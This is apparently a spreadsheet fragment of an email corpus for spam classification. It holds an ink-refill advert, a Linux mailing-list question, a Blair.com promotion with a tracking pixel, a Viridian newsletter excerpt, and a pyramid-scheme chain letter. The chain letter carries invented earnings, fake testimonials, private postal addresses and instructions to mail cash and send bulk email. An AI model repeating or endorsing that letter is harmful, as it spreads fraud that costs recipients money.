 ICAgICAgICAgICAgIDxicj4NCiAgICAgICAgICAgICAgICAgICAgICAgICAg
 ICAgICAgICAgICAgICAgDQogICAgICAgICAgICA8ZGl2IGFsaWduPSJDZW50
 ZXIiPjxpbWcgc3JjPSJodHRwOi8vcGhlcm9tb25lLWxhYnMuY29tL2ltYWdl
 cy9maWxsLWpldC5qcGciIGFsdD0iRklMTCBKRVQgUElDVFVSRSIgd2lkdGg9
 IjI1MCIgaGVpZ2h0PSIzMDUiPg0KICAgICAgICAgICAgICAgPGJyPg0KICAg
 ICAgICAgICAgICAgPC9kaXY+DQogICAgICAgICAgICAgICA8YnI+DQogICAg
 ICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgPHRkIHZhbGlnbj0i
 VG9wIiB3aWR0aD0iNzAlIj48Zm9udCBzaXplPSIrMiIgY29sb3I9IiNmZmZm
 ZmYiPg0KICAgKiZuYnNwOyAgMSBCb3R0bGUgb2YgQmxhY2sgaW5rPGJyPg0K
 ICAgICAgICAgICAgICAgPGJyPg0KICAgICAgKiZuYnNwOyAxIEJvdHRsZSBv
 ZiBNYWdlbnRhIGluazxicj4NCiAgICAgICAgICAgICAgIDxicj4NCiAgICAg
 ICombmJzcDsgMSBCb3R0bGUgb2YgQ3lhbiBpbms8YnI+DQogICAgICAgICAg
 ICAgICA8YnI+DQogICAgICAqJm5ic3A7IDEgQm90dGxlIG9mIFllbGxvdyBp
 bms8YnI+DQogICAgICAgICAgICAgICA8YnI+DQogICAgICAqJm5ic3A7IEFs
 bCB0aGUgdG9vbHMgeW91IG5lZWQ8YnI+DQogICAgICAgICAgICAgICA8YnI+
 DQogICAgICAqJm5ic3A7IEEgZGV0YWlsZWQgaW5zdHJ1Y3Rpb24gYm9va2xl
 dDxicj4NCiAgICAgICAgICAgICAgIDxicj4NCiAgICAgICombmJzcDsgQSBU
 dXRvcmlhbCBDRDxicj4NCiAgICAgICAgICAgICAgIDxicj4NCiAgICAgICom
 bmJzcDsgMSBmcmVlIGJvbnVzIGJvdHRsZSBvZiBCbGFjayBJbmsgPHU+PGZv
 bnQgY29sb3I9IiMzM2ZmMzMiPkFCU09MVVRFTFkNCiAgIEZSRUU8YnI+DQog
 ICAgICAgICAgICAgICA8L2ZvbnQ+PC91Pjxicj4NCiAgICAgICAgICAgICAg
 IDwvZm9udD48L3RkPg0KICAgICAgICAgICAgIDwvdHI+DQogICAgICAgICAg
 ICAgICAgICAgICAgICAgICAgIA0KICAgICAgICA8L3Rib2R5PiAgICAgICAg
 ICAgICAgICAgICAgIA0KICAgICAgPC90YWJsZT4NCiAgICAgICAgIDxicj4N
 CiAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICA8ZGl2IGFsaWduPSJM
 ZWZ0Ij48Zm9udCBzaXplPSIrMiI+PGJyPg0KICAgICAgICAgPGZvbnQgY29s
 b3I9IiNmZmZmZmYiPjxmb250IGNvbG9yPSIjMDBjY2NjIj5SZWZ1bmQgSW5z
 dHJ1Y3Rpb25zOiANCiAgICAgIDwvZm9udD48L2ZvbnQ+PC9mb250Pjxmb250
 IGNvbG9yPSIjZmZmZmZmIj4mbmJzcDs8Zm9udCBzaXplPSIrMiI+V2UNCmFy
 ZSBub3QgbGlrZSB0aGUgb3RoZXIgd2Vic2l0ZXMgdGhhdCBvZmZlciBhIDMw
 IGRheSByZWZ1bmQsIHdoaWNoIGJ5IGxhdw0KdGhleSBtdXN0IG9mZmVyOyB3
 ZSBvZmZlciB5b3UgYTwvZm9udD48L2ZvbnQ+PGZvbnQgc2l6ZT0iKzIiPjxm
 b250IGNvbG9yPSIjMzNmZjMzIj4NCiA8L2ZvbnQ+PHU+PGZvbnQgY29sb3I9
 IiMzM2ZmMzMiPkxJRkVUSU1FICBHVUFSQU5URUUhPC9mb250PjwvdT4gPC9m
 b250Pjxmb250IGNvbG9yPSIjZmZmZmZmIiBzaXplPSIrMiI+DQpJZiB5b3Ug
 ZG8gbm90IGxpa2UgdGhlIHByb2R1Y3QgYWxsIHlvdSBoYXZlIHRvIGRvIGlz
 IHNlbmQgaXQgYmFjayBmb3IgYTwvZm9udD48Zm9udCBzaXplPSIrMiI+DQog
 PGZvbnQgY29sb3I9IiMzM2ZmMzMiPkZVTEwgUkVGVU5EITwvZm9udD4uPC9m
 b250Pjxicj4NCiAgICAgICAgIDwvZGl2Pg0KICAgICAgICAgPGJyPg0KICAg
 ICAgICAgPGZvbnQgY29sb3I9InJlZCI+PGZvbnQgc2l6ZT0iKzIiPlNQRUNJ
 QUwgPHU+T05FLVRJTUU8L3U+IEJPTlVTDQpPRkZFUiEhPC9mb250Pjxicj4N
 CiAgICAgICAgIDxicj4NCiAgICAgICAgIDwvZm9udD48Zm9udCBzaXplPSIr
 MiIgY29sb3I9IiMwMGNjY2MiPi4uLiBQdXJjaGFzZSAyIFJlZmlsbCBLaXRz
 DQogYW5kIFNoaXBwaW5nIGlzIEZSRUUhIDxicj4NCiAgICAuLi4uIG9yIFB1
 cmNoYXNlIDMgUmVmaWxsIEtpdHMgYW5kIGdldCB0aGUgNHRoIG9uZSBGUkVF
 ISA8L2ZvbnQ+PGJyPg0KICAgICAgICAgPGJyPg0KICAgICAgICAgPGJyPg0K
 ICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgIDx0YWJsZSBjZWxscGFk
 ZGluZz0iMiIgY2VsbHNwYWNpbmc9IjIiIGJvcmRlcj0iMSIgd2lkdGg9IjEw
 MCUiPg0KICAgICAgICAgICA8dGJvZHk+DQogICAgICAgICAgICAgPHRyPg0K
 ICAgICAgICAgICAgICAgPHRkIHZhbGlnbj0iVG9wIj48aW1nIHNyYz0iaHR0
 cDovL3BoZXJvbW9uZS1sYWJzLmNvbS9pbWFnZXMvZ3VhcmFudGVlLmdpZiIg
 YWx0PSJHdWFyYW50ZWUhIiB3aWR0aD0iMjAwIiBoZWlnaHQ9IjIwMiI+DQog
 ICAgICAgICAgICAgICA8YnI+DQogICAgICAgICAgICAgICA8L3RkPg0KICAg
 ICAgICAgICAgICAgPHRkIHZhbGlnbj0iVG9wIj4gICAgICAgICAgICAgICAg
 ICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIDxkaXYgYWxp
 Z249IkNlbnRlciI+PGEgaHJlZj0iaHR0cDovL3BoZXJvbW9uZS1sYWJzLmNv
 bS9maWxsLWpldC5odG0iPjxmb250IHNpemU9IiszIj48YnI+DQogICAgICBP
 UkRFUiBOT1chPC9mb250Pjxicj4NCiAgICAgICAgICAgICAgIDwvYT4NCiAg
 ICAgICAgICAgICAgIDxicj4NCiAgICAgICAgICAgICAgIDxicj4NCiAgICAg
 ICAgICAgICAgIDxicj4NCiAgICAgICAgICAgICAgIDxmb250IHNpemU9Iisy
 IiBjb2xvcj0iI2ZmZmZmZiI+VGhhbmsgWW91IEZvciBZb3VyIFRpbWUsIEFu
 ZCANCiBJIEhvcGUgIFRvIEhlYXIgRnJvbSBZb3UgU29vbiE8L2ZvbnQ+PGJy
 Pg0KICAgICAgICAgICAgICAgPGJyPg0KICAgICAgICAgICAgICAgPC9kaXY+
 DQogICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgIDwvdHI+DQog
 ICAgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICA8L3Rib2R5
 PiAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgPC90YWJsZT48YnI+PGJy
 Pg0KPGNlbnRlcj4NCiAgICAgIDxmb250IGZhY2U9IlZlcmRhbmEiIGNvbG9y
 PSIjZmZmZmZmIiBzaXplPSIxIj5Zb3UgYXJlIHJlY2VpdmluZyB0aGlzIA0K
 ICAgICAgc3BlY2lhbCBvZmZlciBiZWNhdXNlIHlvdSBoYXZlIHByb3ZpZGVk
 IHBlcm1pc3Npb24gdG8gcmVjZWl2ZSBlbWFpbCANCiAgICAgIGNvbW11bmlj
 YXRpb25zIHJlZ2FyZGluZyBzcGVjaWFsIG9ubGluZSBwcm9tb3Rpb25zIG9y
 IG9mZmVycy4gSWYgeW91IGZlZWwgDQogICAgICB5b3UgaGF2ZSByZWNlaXZl
 ZCB0aGlzIG1lc3NhZ2UgaW4gZXJyb3IsIG9yIHdpc2ggdG8gYmUgcmVtb3Zl
 ZCBmcm9tIG91ciANCiAgICAgIHN1YnNjcmliZXIgbGlzdCwNCiAgICAgIDxh
 IHN0eWxlPSJjb2xvcjogI2ZmMDAwMCIgaHJlZj0ibWFpbHRvOkFmZmlsaWF0
 ZTFAYnRhbWFpbC5uZXQuY24/c3ViamVjdD1SZW1vdmVfTWVfVmlnb3JhbCI+
 Q2xpY2sgSEVSRTwvYT4gYW5kIHlvdSB3aWxsIGJlIHJlbW92ZWQgd2l0aGlu
 IGxlc3MgdGhhbiB0aHJlZSBidXNpbmVzcyANCiAgICAgIGRheXMuIFRoYW5r
 IFlvdSBhbmQgc29ycnkgZm9yIGFueSBpbmNvbnZlbmllbmNlLjwvZm9udD48
 L3RkPg0KICAgIDwvdHI+DQogDQo8L2Rpdj4NCiAgICAgICAgICAgICAgICAg
 ICAgICAgDQogICAgIA0KICAgICANCjwvYm9keT4NCjwvaHRtbD4NCg0KMTMw
 OVRKb2QzLTM3MG53VHAzNzA2SFF6bDItNTAzZ21XdTQ0NjhUamN1Ny02NjdB
 U3NxNzk4M1RGZGgyLTJsNTg=
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] relating data from 2 ascii files ?
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi folks,
 Apologies if this is the wrong place to ask, but I am trying to do on my linux desktop what I used to do with some other os software.
 I'm trying to use a combination of some bash scripts and some perl to generate reports from a couple of ascii files. Eventually these will run on a server and get the files by ftp, analyse them and mail me the results.
 As I'm no programmer (by any stretch of the imagination !) I'm getting a bit lost.
 I can deal with single files (eventually) using grep, egrep, awk, and a nice perl script called 'total' which i found while googling.
 Problem now is that the data I'm trying to report on is split between two isam files.
 File 1 contains
 Docket Number, Line Number, Item, quantity, price, duedate
 File 2 contains
 Docket Number, Customer, Shipping date, invoice number.
 To make some sense of the data, I need to relate the Docket number between the 2 files, so that I can generate a report by customer.
 My first reaction is to look at mysql, and import the ascii data into 2 tables so that I can use sql queries.
 Is this the way to go, or should I delve a bit deeper into perl ?
 Any advice welcome.
 Thanks,
 Declan
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Real Money Maker for Real!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Dear Friends &amp; Future Millionaire: 
 AS SEEN ON NATIONAL TV: 
 Making over half million dollars every 4 to 5 months from your home for 
 an investment of only $25 U.S. Dollars expense one time 
 THANK'S TO THE COMPUTER AGE AND THE INTERNET ! 
 ================================================== 
 BE A MILLIONAIRE LIKE OTHERS WITHIN A YEAR!!! 
 Before you say ''Bull'', please read the following. This is the letter you 
 have been hearing about on the news lately. Due to the popularity of 
 this letter on the Internet, a national weekly news program recently devoted 
 an entire show to the investigation of this program described below, to see 
 if it really can make people money. The show also investigated whether or 
 not the program was legal. 
 Their findings proved once and for all that there are ''absolutely NO Laws 
 prohibiting the participation in the program and if people can -follow the 
 simple instructions, they are bound to make some mega bucks with only 
 $25 out of pocket cost''. DUE TO THE RECENT INCREASE OF 
 POPULARITY &amp; RESPECT THIS PROGRAM HAS ATTAINED, 
 IT IS CURRENTLY WORKING BETTER THAN EVER. 
 This is what one had to say: ''Thanks to this profitable opportunity. I 
 was approached many times before but each time I passed on it. I am 
 so gladI finally joined just to see what one could expect in return for the 
 minimal effort and money required. To my astonishment, I received total $ 
 610,470.00 in 21 weeks, with money still coming in." 
 Pam Hedland, Fort Lee, New Jersey. 
 =================================================== 
 Here is another testimonial: "This program has been around for a long 
 time but I never believed in it. But one day when I received this again 
 in the mail I decided to gamble my $25 on it. I followed the simple 
 instructions and walaa ..... 3 weeks later the money started to come in. 
 First month I only made $240.00 but the next 2 months after that I made 
 a total of $290,000.00. So far, in the past 8 months by re-entering the 
 program, I have made over $710,000.00 and I am playing it again. The 
 key to success in this program is to follow the simple steps and NOT change 
 anything.'' More testimonials later but first, 
 ===== PRINT THIS NOW FOR YOUR FUTUREREFERENCE ====== 
 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 
 If you would like to make at least $500,000 every 4 to 5 months easily and 
 comfortably, please read the following...THEN READ IT AGAIN and AGAIN!!! 
 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 
 FOLLOW THE SIMPLE INSTRUCTION BELOW AND YOUR FINANCIAL 
 DREAMS WILL COME TRUE, GUARANTEED! INSTRUCTIONS: 
 =====Order all 5 reports shown on the list below ===== 
 For each report, send $5 CASH, THE NAME &amp; NUMBER OF THE REPORT 
 YOU ARE ORDERING and YOUR E-MAIL ADDRESS to the person whose 
 name appears ON THAT LIST next to the report. MAKE SURE YOUR RETURN 
 ADDRESS IS ON YOUR ENVELOPE TOP LEFT CORNER in case of any mail 
 problems. 
 === When you place your order, make sure you order each of the 5 reports. 
 You will need all 5 reports so that you can save them on your computer 
 and resell them. YOUR TOTAL COST $5 X 5=$25.00. 
 Within a few days you will receive, vie e-mail, each of the 5 reports from 
 these 5 different individuals. Save them on your computer so they will be 
 accessible for you to send to the 1,000's of people who will order them 
 from you. Also make a floppy of these reports and keep it on your desk in 
 case something happen to your computer. 
 IMPORTANT - DO NOT alter the names of the people who are listed next 
 to each report, or their sequence on the list, in any way other than what is 
 instructed below in step '' 1 through 6 '' or you will loose out on majority 
 of your profits. Once you understand the way this works, you will also see 
 how it does not work if you change it. Remember, this method has been 
 tested, and if you alter, it will NOT work !!! People have tried to put their 
 friends/relatives names on all five thinking they could get all the money. But 
 it does not work this way. Believe us, we all have tried to be greedy and then 
 nothing happened. So Do Not try to change anything other than what is 
 instructed. Because if you do, it will not work for you.
 Remember, honesty reaps the reward!!! 
 1.... After you have ordered all 5 reports, take this advertisement and 
 REMOVE the name &amp; address of the person in REPORT # 5. This person 
 has made it through the cycle and is no doubt counting their fortune. 
 2.... Move the name &amp; address in REPORT # 4 down TO REPORT # 5. 
 3.... Move the name &amp; address in REPORT # 3 down TO REPORT # 4. 
 4.... Move the name &amp; address in REPORT # 2 down TO REPORT # 3. 
 5.... Move the name &amp; address in REPORT # 1 down TO REPORT # 2 
 6.... Insert YOUR name &amp; address in the REPORT # 1 Position. PLEASE MAKE 
 SURE you copy every name &amp; address ACCURATELY! 
 ========================================================== 
 **** Take this entire letter, with the modified list of names, and save it on your 
 computer. DO NOT MAKE ANY OTHER CHANGES. 
 Save this on a disk as well just in case if you loose any data. To assist you with 
 marketing your business on the internet, the 5 reports you purchase will provide 
 you with invaluable marketing information which includes how to send bulk 
 e-mails legally, where to find thousands of free classified ads and much more. 
 There are 2 Primary methods to get this venture going: 
 METHOD # 1: BY SENDING BULK E-MAIL LEGALLY 
 ==========================================================
 Let's say that you decide to start small, just to see how it goes, and we will 
 assume You and those involved send out only 5,000 e-mails each. Let's 
 also assume that the mailing receive only a 0.2% response (the response 
 could be much better but lets just say it is only 0.2%. Also many people 
 will send out hundreds of thousands e-mails instead of only 5,000 each). 
 Continuing with this example, you send out only 5,000 e-mails. With a 0.2% 
 response, that is only 10 orders for report # 1. Those 10 people responded 
 by sending out 5,000 e-mail each for a total of 50,000. Out of those 50,000 
 e-mails only 0.2% responded with orders. That's=100 people responded and 
 ordered Report # 2
 . 
 Those 100 people mail out 5,000 e-mails each for a total of 500,000 e-mails. 
 The 0.2% response to that is 1000 orders for Report # 3. 
 Those 1000 people send out 5,000 e-mails each for a total of 5 million e-mails 
 sent out. The 0.2% response to that is 10,000 orders for Report # 4.
 Those 10,000 people send out 5,000 e-mails each for a total of 50,000,000 
 (50 million) e-mails. The 0.2% response to that is 100,000 orders for Report 
 # 5
  THAT'S 100,000 ORDERS TIMES $5 EACH=$500,000.00 (half million).
 Your total income in this example is: 1..... $50 + 2..... $500 + 3..... $5,000 + 4 
 ... $50,000 + 5..... $500,000 ........ Grand Total=$555,550.00 
 NUMBERS DO NOT LIE. GET A PENCIL &amp; PAPER AND FIGUREOUT 
 THE WORST POSSIBLE RESPONSES AND NO MATTER HOW YOU 
 CALCULATE IT, YOU WILL STILL MAKE A LOT OF MONEY !
 ========================================================= 
 REMEMBER FRIEND, THIS IS ASSUMING ONLY 10 PEOPLE 
 ORDERING OUT OF 5,000 YOU MAILED TO. 
 Dare to think for a moment what would happen if everyone or half or even 
 one 4th of those people mailed 100,000e-mails each or more? There are 
 over 150 million people on the Internet worldwide and counting. Believe me, 
 many people will do just that, and more! 
 METHOD # 2 : BY PLACING FREE ADS ON THE INTERNET 
 ======================================================= 
 Advertising on the net is very very inexpensive and there are hundreds 
 of FREE places to advertise. Placing a lot of free ads on the Internet will 
 easily get a larger response. We strongly suggest you start with Method # 1 
 and dd METHOD # 2 as you go along. For every $5 you receive, all you 
 must do is e-mail them the Report they ordered. That's it. Always provide 
 same day service on all orders. 
 This will guarantee that the e-mail they send out, with your name and 
 address on it, will be prompt because they can not advertise until they 
 receivethe report. 
 =========== AVAILABLE REPORTS ==================== 
 ORDER EACH REPORT BY ITS NUMBER &amp; NAME ONLY. Notes: 
 Always send $5 cash (U.S. CURRENCY) for each Report. Checks NOT 
 accepted. Make sure the cash is concealed by wrapping it in at least 2 sheets 
 of paper. On one of those sheets of paper, Write the NUMBER &amp; the NAME 
 of the Report you are ordering, YOUR E-MAIL ADDRESS and your name 
 and postal address. 
 PLACE YOUR ORDER FOR THESE REPORTS NOW : 
 ==================================================== 
 REPORT # 1: "The Insider's Guide to Advertising for Free on the Net" 
 Order Report #1 from: 
  A. Christ
 1208 Allendale Rd.
 Mechanicsburg, PA 17055
 ___________________________________________________________ 
 REPORT # 2: "The Insider's Guide to Sending Bulk e-mail on the Net" 
 Order Report # 2 from: 
     Michael P. 
     2508 Robin 
     Altus, OK  73521 
     USA 
 ____________________________________________________________ 
 REPORT # 3: "Secret to Multilevel Marketing on the Net" 
 Order Report # 3 from : 
 D. J.
 16 Northcrest Dr.
 London, ONTARIO, CANADA
 N5X 3V8
 __________________________________________________________ 
 REPORT # 4: "How to Become a Millionaire Utilizing MLM &amp; the Net" 
 Order Report # 4 from:
 E. Zurbrigg
 RR #1
 St. Marys, ON, Canada
 N4X 1C4
 ____________________________________________________________ 
 REPORT #5: "How to Send Out 0ne Million e-mails for Free" 
 Order Report # 5 from: 
 A. Ebert
 R. R. #4
 Thamesford, Ontario, Canada
 N0M 2M0
 ____________________________________________________________ 
 $$$$$$$$$ YOUR SUCCESS GUIDELINES $$$$$$$$$$$ 
 Follow these guidelines to guarantee your success: 
 === If you do not receive at least 10 orders for Report #1 within 2 
 weeks, continue sending e-mails until you do. 
 === After you have received 10 orders, 2 to 3 weeks after that you 
 should receive 100 orders or more for REPORT # 2. If you did not, 
 continue advertising or sending e-mails until you do. 
 === Once you have received 100 or more orders for Report # 2, YOU 
 CAN RELAX, because the system is already working for you, and the 
 cash will continue to roll in ! THIS IS IMPORTANT TO REMEMBER: 
 Every time your name is moved down on the list, you are placed in front 
 of a Different report. 
 You can KEEP TRACK of your PROGRESS by watching which report 
 people are ordering from you. IF YOU WANT TO GENERATE MORE 
 INCOME SEND ANOTHER BATCH OF E-MAILS AND START 
 THE WHOLE PROCESS AGAIN. 
 There is NO LIMIT to the income you can generate from this business !!! 
 ====================================================== 
 FOLLOWING IS A NOTE FROM THE ORIGINATOR OF THIS 
 PROGRAM: You have just received information that can give you 
 financial freedom for the rest of your life, with NO RISK and JUST 
 A LITTLE BIT OF EFFORT. You can make more money in the next 
 few weeks and months than you have ever imagined. Follow the program 
 EXACTLY AS INSTRUCTED. Do Not change it in any way. It works 
 exceedingly well as it is now. 
 Remember to e-mail a copy of this exciting report after you have put 
 your name and address in Report #1 and moved others to #2 ...........# 5 
 as instructed above. One of the people you send this to may send out 
 100,000 or more e-mails and your name will be on every one of them. 
 Remember though, the more you send out the more potential customers 
 you will reach. 
 So my friend, I have given you the ideas, information, materials and 
 opportunity to become financially independent. IT IS UP TO YOU NOW ! 
 ============ MORE TESTIMONIALS ================ 
 "My name is Mitchell. My wife, Jody and I live in Chicago. I am an 
 accountant with a major U.S. Corporation and I make pretty good money. 
 When I received this program I grumbled to Jodyaboutreceiving ''junk 
 mail''. I made fun of the whole thing,spoutingmy knowledge of the population 
 and percentages involved. I ''knew'' it wouldn't work. Jody totally ignored 
 my supposed intelligence and few days later she jumped in with both feet. I 
 made merciless fun of her, and was ready to lay the old ''I told you so'' on 
 her when the thing didn't work. Well, the laugh was on me! Within 3 weeks 
 she had received 50 responses. Within the next 45 days she had received 
 total $ 147,200.00 ........... all cash! I was shocked. I have joined Jody 
 in her ''hobby''. 
 Mitchell Wolf M.D., Chicago, Illinois 
 ====================================================== 
 ''Not being the gambling type, it took me several weeks to make up my 
 mind to participate in this plan. But conservative that I am, I decided that 
 the initial investment was so little that there was just no way that I 
 wouldn't get enough orders to at least get my money back''. '' I was 
 surprised when I found my medium size post office box crammed with 
 orders. I made $319,210.00in the first 12 weeks. The nice thing about 
 this deal is that it does not matter where people live. There simply isn't a 
 better investment with a faster return and so big." 
 Dan Sondstrom, Alberta, Canada 
 ======================================================= 
 ''I had received this program before. I deleted it, but later I wondered 
 if I should have given it a try. Of course, I had no idea who to contact to 
 get another copy, so I had to wait until I was e-mailed again by someone 
 else.........11 months passed then it luckily came again...... I did not 
 delete this one! I made more than $490,000 on my first try and all the 
 money came within 22 weeks." 
 Susan De Suza, New York, N.Y. 
 ======================================================= 
 ''It really is a great opportunity to make relatively easy money with 
 little cost to you. I followed the simple instructions carefully and 
 within 10 days the money started to come in. My first month I made 
 $20,560.00 and by the end of third month my total cash count was 
 $362,840.00. Life is beautiful, Thanx to internet.". 
 Fred Dellaca, Westport, New Zealand 
 ======================================================= 
 ORDER YOUR REPORTS TODAY AND GET STARTED ON 
 'YOUR' ROAD TO FINANCIAL FREEDOM ! 
 =======================================================
 If you have any questions of the legality of this program, contact the 
 Office of Associate Director for Marketing Practices, Federal Trade 
 Commission, Bureau of Consumer Protection, Washington, D.C.
 (Note: To avoid delays make sure appropriate postage to Canada is applied if mailing from the US)
 To be removed: moretips2000@yahoo.com   Subject: Remove
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Free Shipping on all orders at Blair.com
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;TABLE id=AutoNumber2 style="BORDER-COLLAPSE: collapse" 
       borderColor=#111111 cellSpacing=1 cellPadding=0 width=715 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD vAlign=top width=27&gt;&lt;a href="http://www.frugaljoe.com"&gt;&lt;IMG  
             src="http://www.frugaljoe.com/logo.jpg"  border=0&gt;&lt;/a&gt;&lt;/TD&gt;
           &lt;TD width=1 bgColor=#ffcc99&gt;&lt;IMG height=1 
             src="http://www.salealerts.com/dot.gif" width=1 border=0&gt;&lt;/TD&gt;
           &lt;TD vAlign=top&gt;&lt;I&gt;&lt;B&gt;&lt;FONT face=Verdana size=2&gt;
             &lt;CENTER&gt;Never Pay Retail!&lt;/FONT&gt;&lt;FONT face=Verdana size=0&gt;&lt;/B&gt;&lt;br&gt;&lt;/CENTER&gt;&lt;/I&gt;&lt;IMG height=20 
             src="http://www.salealerts.com/dot.gif" width=459 border=0&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=715 bgColor=#ffcc99 colSpan=3 height=1&gt;&lt;IMG height=1 
             src="http://www.salealerts.com/dot.gif" width=1 
   border=0&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/DIV&gt;&lt;/TD&gt;
 &lt;FONT face=Verdana size=1&gt;
 &lt;head&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;table width="465" border=0 cellspacing=0&gt;
  &lt;tr&gt;
   &lt;TD&gt;
   &lt;img src="http://www.blair.com/images/email/FSHprospectHDRblue_4C.jpg" border="0"&gt;
 &lt;font face="Times New Roman" color="black" size="3"&gt;&amp;nbsp;&amp;nbsp;You can count on Blair.com for savings, selection and satisfaction all day,&lt;br&gt;
 &amp;nbsp;&amp;nbsp;every day. Plus, for a limited time, you'll enjoy &lt;font face="Times New Roman" color="red" size="3"&gt;&lt;b&gt;FREE&lt;/b&gt; standard shipping&lt;font face="Times New Roman" color="black" size="3"&gt; on&lt;br&gt;
 &amp;nbsp;&amp;nbsp;every order. So shop now!&lt;br&gt;
 &lt;br&gt;
 &lt;ul&gt;&lt;ul&gt;&lt;ul&gt;
 &amp;nbsp;&lt;b&gt;Women's.&lt;/b&gt; Must-have fashions.&lt;br&gt;
 &amp;nbsp;&lt;b&gt;Men's.&lt;/b&gt; Dress and casual favorites.&lt;br&gt;
 &amp;nbsp;&lt;b&gt;Home.&lt;/b&gt; Values for every room.&lt;br&gt;
 &amp;nbsp;&lt;b&gt;Clearance.&lt;/b&gt; Closeouts at 40%-75% off.&lt;br&gt;
 &lt;/ul&gt;&lt;/ul&gt;&lt;/ul&gt;&lt;/font&gt;
 &lt;table width="465" border=0 cellspacing=0&gt;
 &lt;tr&gt;
 &lt;TD align=Center valign=Middle&gt;
 &lt;a href="http://clickserve.cc-dt.com/link/click?lid=41000000000452850"&gt;&lt;img src="http://www.blair.com/images/email/FSH_fallWinBUTblue.gif" border="0"&gt;&lt;/a&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;br&gt;
 &lt;font face="Times New Roman" color="black" size="3"&gt;&amp;nbsp;&amp;nbsp;Just click the button above to go to Blair.com and enjoy FREE shipping &lt;br&gt;
 &amp;nbsp;&amp;nbsp;automatically on your entire order. (You'll see the savings at checkout.)&lt;br&gt;
 &amp;nbsp;&amp;nbsp;Don't wait. &lt;b&gt;&lt;i&gt;This offer ends October 15, 2002.&lt;/i&gt;&lt;/b&gt;&lt;br&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;hr align="left" width="465"&gt;
 &lt;hr align="left" width="465"&gt;
 BLAIR 2000-2002   |   220 Hickory St., Warren, PA 16366
 &lt;/body&gt;
 &lt;TABLE id=AutoNumber3 style="BORDER-COLLAPSE: collapse" borderColor=#111111 
 cellSpacing=1 cellPadding=0 width=715 border=0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD width=715 bgColor=#ffcc99 colSpan=3 height=1&gt;&lt;IMG height=1 
       src="dot.gif" width=1 border=0&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD vAlign=top width=27&gt;&lt;a href="http://www.frugaljoe.com"&gt;&lt;IMG  
             src="http://www.frugaljoe.com/logo.jpg"  border=0&gt;&lt;/a&gt;
 &lt;/TD&gt;
     &lt;TD width=1 bgColor=#ffcc99&gt;&lt;IMG height=1 
       src="http://www.salealerts.com/dot.gif" width=1 border=0&gt;
 &lt;/TD&gt;
     &lt;TD vAlign=top&gt;&lt;I&gt;&lt;/I&gt;&lt;FONT face=Verdana size=1&gt;&lt;BR&gt;
 You have received this email because you have subscribed 
       through one of our marketing partners. If you would like 
       to learn more about Frugaljoe.com then please visit our website 
       www.frugaljoe.com If this message was sent to you in error, or
 if you 
       would like to unsubscribe please click &lt;A 
 href="http://www.frugaljoe.com/unsubscribe.php?eid=384847\~moc.cnietonten^^mj\~1754388\~12a1"&gt;here &lt;/a&gt;or
 cut and paste the following link into a web browser:&lt;br&gt;
  http://www.frugaljoe.com/unsubscribe.php?eid=384847\~moc.cnietonten^^mj\~1754388\~12a1
 &lt;br&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;IMG height=20
 src="http://www.salealerts.com/dot.gif" 
       width=459 border=0&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 &lt;/html&gt;
 &lt;img src="http://www.330w.com/open/open.php?eid=zzzz@spamassassin.taint.org&amp;oid=Blair-09252002-HTML&amp;custid=frugaljoe" border=0 height=0 width=0&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Viridian Note 00326:  Air-Conditioned Tokyo
</t>
  </si>
  <si>
    <t xml:space="preserve">Key concepts:  Tokyo, urban overheating,
 climate change remediation
 Attention Conservation Notice: a weird,
 hand-waving Nipponese mega-scheme.
 Links:
 http://http://www.viridiandesign.org/products/furniture.htm
 From:Laurence Aurbach &lt;translucent*spamcop.net?&gt;
 Subject:Viridian Furniture List
 The Viridian Furniture List is now online in the 
 "Recommended Products" section of the Viridian website. 
 David Bergman did a yeoman-like job assembling this list 
 and adding comments. He's also mirroring the list on his 
 own furniture site, Fire and Water.
 http://cyberg.com/fw/ecofurn.htm 
 Maybe you'll find a woven bamboo buffet or a biopolymer 
 mesh coffee table. == L.J. Aurbach
 ---------------------------------------------------
 Entries in the Global Civil Society Design Contest.
 From: Steven W. Schuldt &lt;swschuldt*mac.com&gt;
 http://www.americanrobotz.com/images2/Soon_GlobalCivilSocietyLaptop.jpg
 From: Ben Davis &lt;bend*earthlink.net&gt;
 http://www.digitaleverything.com/GlobalComputer.htm
 From: Joerg F. Wittenberger &lt;Joerg.Wittenberger*pobox.com&gt;
 http://www.askemos.org/ 
 http://www.askemos.org:9080/RomePaper.pdf
